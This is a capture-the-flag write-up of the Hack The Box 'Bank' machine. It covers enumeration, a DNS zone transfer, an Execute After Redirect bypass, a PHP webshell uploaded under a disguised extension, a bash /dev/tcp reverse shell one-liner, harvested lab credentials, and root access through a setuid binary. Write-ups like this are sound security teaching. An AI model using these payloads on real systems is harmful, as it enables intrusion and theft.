Bank Writeup

11 October 2022 #CTF #HTB #box #easy #linux

bank info


Honestly, just run nmap:

$ sudo nmap -p- -T4 -oN enum/fulltcp.nmap
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
$ ports=$(awk -F/ '/^[[:digit:]]{1,5}\// {printf "%s,", $1}' enum/fulltcp.nmap)
$ sudo nmap -p $ports -sCV -oN enum/scripts.nmap
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-title: HTB Bank - Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


DNS is listening on tcp, so it's worth trying a zone transfer:

$ dig @ bank.htb axfr
bank.htb.        604800  IN      SOA     bank.htb. 5 604800 86400 2419200 604800
bank.htb.        604800  IN      NS
bank.htb.        604800  IN      A     604800  IN      A    604800  IN      CNAME   bank.htb.
bank.htb.        604800  IN      SOA     bank.htb. 5 604800 86400 2419200 604800

And it works! We get the confirmation that bank.htb exists as well as a potential username: 'chris'.


Taking a look at the websever, we see the default Ubuntu apache installation page:

default apache installation page


We discovered a hostname with a DNS zone transfer so let's see if there is something else on here:

bank.htb login page

We indeed get login page. Let's run a gobuster while we're at it:

$ gobuster dir -u http://bank.htb/ -x php -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 35 -o enum/80-bank.htb.dir
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/.                    (Status: 302) [Size: 7322] [--> login.php]
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/login.php            (Status: 200) [Size: 1974]

The interesting thing is the size of the response for /support.php and /index.php is abnormally large for a 302 response.

This might indicate a Execute After Redirect vulnerability, which would let us access the application without logging in.

Let's intercept a request to /index.php with Burp and before forwarding, right click and go to 'Do intercept' -> 'Response to this request':

intercept response to request with Burp

Then forward the request:

response with EAR

And here we can see the html of the page, even though we were redirected to /login.php. To see the page in our browser, just change '302 Found' by '200 OK' and forward again:


We can check /support.php as well:


There an interesting comment in the source of this page:

source of support.php


Let's start by trying to upload a simple php webshell:

$ echo '<?php system($_REQUEST["cmd"]); ?>' > cmd.php

Then submit the form it and check the response:

webshell php upload fail

Looks like we can't upload php files... But remember the comment we saw on the source of the page, it was talking about a '.htb' extension that is executed as php.

Just change the extension to 'htb' and upload again:

upload htb webshell

Then go to http://bank.htb/uploads/cmd.htb?cmd=id:

rce with webshell

Reverse shell time: intercept the request in Burp and use a bash reverse shell:

bash -c 'bash -i >& /dev/tcp/ 0>&1'

Since this payload contains bad characters (like '&') we want to URL encode all characters with right click -> 'Convert selection' -> 'URL' -> 'URL-encode all characters':

bash reverse shell in GET parameter

And boom! We got a shell as 'www-data'.


After looking a bit around the web directory we find mysql creds in /var/www/bank/inc/user.php:

$mysql = new mysqli("localhost", "root", "!@#S3cur3P4ssw0rd!@#", "htbbank");

The database unfortunately doesn't have any interesting information, except an uncrackable (with rockyou.txt) md5 hash:

mysql> select * from users;
| id | username               | email          | password                         | balance |
|  1 | Christos Christopoulos | chris@bank.htb | b27179713f7bffc48b9ffd2cf9467620   | 1.337   |

The mysql password does not allow us to login as root or chris.

Moving on, we can find another password still in the webroot:

www-data@bank:/var/www/bank$ cat bankreports.txt
| HTB Bank Report |

Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 2
Transactions: 8
Balance: 1.337$

The hash we found in the database (b27179713f7bffc48b9ffd2cf9467620) is actually the hash of this password. But again, this password is pretty much useless.

At this point, I like running a find command to search for unusual setuid executables:

www-data@bank:/var/www/bank$ find / -user root -perm -u=s 2> /dev/null

This /var/htb/bin/emergency binary is definitely not standard. Let's execute it and see what happens (what could go wrong):

www-data@bank:/var/www/bank$ /var/htb/bin/emergency
# whoami

Well, it seems like we are in a root shell...

Key Takeaways